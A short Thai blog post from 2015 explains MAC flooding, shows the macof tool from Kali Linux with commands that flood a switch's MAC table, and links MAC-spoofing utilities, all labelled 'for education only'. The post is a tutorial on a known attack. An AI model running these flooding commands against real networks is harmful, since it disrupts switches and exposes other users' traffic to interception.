วันเสาร์ที่ 25 กรกฎาคม พ.ศ. 2558

MAC Flooding คืออะไร? ทำยังไง ? ปลอม MAC Address ยังไง ?

MAC Flooding คืออะไร?


          คือ การส่ง MAC Address มั่วๆ ที่ไม่มีอยู่จริงออกไป ทำให้ Switch เก็บค่า MAC Address ใน Table จนเต็ม จึงทำให้ Switch กลายเป็น  hub ธรรมดา เป็นการก่อกวนอีกรูปแบบหนึ่ง

การ Flood MAC Address ด้วย Macof Tool
         
                       Tool ตัวนี้จะอยู่ใน Kali linux 

คำสั่งเช็ค Version

root@bt:~# macof -h
Version: 2.4
Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]
[-i interface] [-n times]

Example (ตัวอย่าง Generate MAC Address ใน Interface eth1 ขึ้นมา 10 ตัว ):


root@bt:~# macof -i eth1 -n 10


วิธีโจมตี (เพื่อการศึกษาเท่านั้น)
-d คือ Destination หรือ เป้าหมาย
-n คือ จำนวนที่จะส่ง Packets ที่ส่งไป

root@bt:~# macof -d 192.168.1.1 -n 100000


Tools ต่างๆที่ใช้ในการปลอม MAC Address

RyII MAC Editor
           สามารถดาวน์โหลดได้ที่นี่ (เพื่อศึกษาเท่านั้นนะ) http://www.softpedia.com/get/Network-Tools/IP-Tools/Ryll-MAC-Editor.shtml 


Technitium MAC Address Changer
           สามารถดาวน์โหลดได้ที่นี่ (เพื่อศึกษาเท่านั้นนะ) https://technitium.com/tmac/


Win7 Mac Changer
           สามารถดาวน์โหลดได้ที่นี่ (เพื่อศึกษาเท่านั้นนะ) http://www.softpedia.com/get/Network-Tools/Misc-Networking-Tools/Win7-MAC-Changer.shtml


ไม่มีความคิดเห็น:

แสดงความคิดเห็น